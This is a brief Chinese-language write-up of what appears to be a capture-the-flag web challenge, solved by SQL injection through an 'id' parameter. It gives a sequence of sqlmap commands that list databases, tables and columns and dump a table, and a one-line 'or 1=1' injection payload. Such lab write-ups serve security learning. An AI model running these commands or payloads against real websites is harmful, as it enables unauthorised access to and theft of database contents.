源代码里没有东西,御剑之类的也扫不到
看到说id,可能id是参数,尝试了几个数,页面都没有变化,也没有延时回显
法一:
看了wp,确实是sql注入,注入点是id,用sqlmap扫就可以出来
sqlmap -u "http://61.147.171.105:52454/?id=1" --dbs
sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber --tables
sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber -T cyber --columns
sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber -T cyber -columns --dump
法二(万能密码):
?id=1' or 1=1--+